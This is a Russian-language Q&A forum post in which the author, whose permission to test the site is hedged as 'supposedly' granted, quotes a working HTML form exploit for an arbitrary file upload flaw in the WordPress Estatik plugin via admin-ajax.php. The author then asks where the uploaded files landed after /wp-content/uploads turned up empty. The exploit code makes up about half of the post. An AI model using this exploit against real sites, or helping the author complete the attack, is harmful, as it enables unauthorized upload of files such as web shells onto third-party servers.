ВОПРОС · Q&A

Arbitrary Upload File

AI-выжимка обсуждения скоро

Краткие тезисы обсуждения со ссылками на ключевые ответы появятся здесь.

Автор вопроса
Имеется сайт, сразу скажу, что (Вроде как), мои действия на нём были разрешены мне, имеется вопрос, на сайте имеется уязвимость, плагин estatik имеется, есть соответственно так же сплойт-код
Код:
<html> <body> <form action="(САЙТ)/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Зашёл в директорию /wp-content/uploads И НИЧЕРТА, серьезно, загружал тхт, джпег, пнг файл и ничерта нет.
Все папки(кроме 1) в 2019-м пусты, куда может загрузился этот файл? ИБо даже wpscan показывает, что присутствует.

_ _ _ 2019-09-28 07-31-11.png
_ _ _ 2019-09-28 07-31-21.png
_ _ _ 2019-09-28 07-31-34.png